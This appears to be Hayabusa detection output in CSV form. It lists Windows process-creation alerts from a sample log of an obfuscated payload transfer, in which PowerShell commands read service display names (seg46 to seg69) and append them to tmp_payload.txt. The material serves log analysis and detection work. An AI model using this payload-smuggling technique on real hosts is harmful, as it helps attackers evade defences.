2021-11-03 17:35:33.739 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg46"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb70 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:35.192 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg47"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x748 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:35.208 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg47"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x8f4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:36.629 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg48"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xca4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:36.645 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg48"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x8f0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:38.069 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg49"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x29c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:38.069 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg49"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xaec | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:39.523 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg50"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe44 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:39.523 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg50"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe20 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:40.969 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg51"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd84 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:40.969 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg51"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x874 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:42.411 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg52"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdd0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:42.411 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg52"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x7c0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:43.868 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg53"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x580 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:43.868 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg53"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x254 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:45.315 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg54"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xa60 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:45.331 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg54"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xba4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:46.783 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg55"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xa6c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:46.783 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg55"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x2ac | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:48.220 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg56"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x964 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:48.236 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg56"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xdd8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:49.667 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg57"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xfa4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:49.667 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg57"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xdcc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:51.102 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg58"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xce4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:51.118 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg58"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xca0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:52.551 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg59"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3cc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:52.566 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg59"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb00 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:54.003 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg60"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xa14 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:54.003 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg60"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xcb8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:55.437 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg61"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x748 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:55.453 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg61"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9c8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:56.883 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg62"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xafc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:56.898 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg62"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe80 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:58.382 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg63"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3d8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:58.382 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg63"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xab8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:59.833 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg64"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe44 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:59.833 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg64"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc30 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:01.284 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg65"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x994 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:01.284 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg65"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xac8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:02.737 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg66"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xa54 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:02.737 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg66"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa84 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:04.183 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg67"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf90 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:04.198 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg67"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe58 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:05.632 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg68"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xbac | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:05.648 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg68"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xcec | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:07.101 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg69"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xfc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
